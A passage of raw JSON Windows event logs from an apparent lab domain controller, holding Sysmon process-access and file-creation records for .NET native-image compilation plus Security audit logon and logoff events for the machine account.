NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7809,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:35.194\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001059250F00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:35.194","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001059250F00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7810,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:35.194\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001059250F00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:35.194","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001059250F00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220716,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xF2B7B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xf2b7b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:06:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220717,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xF2B7B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50271\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xf2b7b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50271","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:06:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220718,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xF2B7B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xf2b7b","LogonType":"3","EventReceivedTime":"2020-08-01 08:06:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7811,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:37.303\r\nProcessGuid: {41C8662E-228B-5F25-0000-001059250F00}\r\nProcessId: 748\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2ec-0\\System.IdentityModel.dll\r\nCreationUtcTime: 2020-08-01 08:06:37.303","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:37.303","ProcessGuid":"{41C8662E-228B-5F25-0000-001059250F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2ec-0\\System.IdentityModel.dll","CreationUtcTime":"2020-08-01 08:06:37.303","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7812,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.381\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010332C0F00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.381","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010332C0F00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7813,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.381\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010332C0F00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.381","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010332C0F00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7814,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.381\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010332C0F00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.381","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010332C0F00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7815,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.444\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010CC2F0F00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.444","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010CC2F0F00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc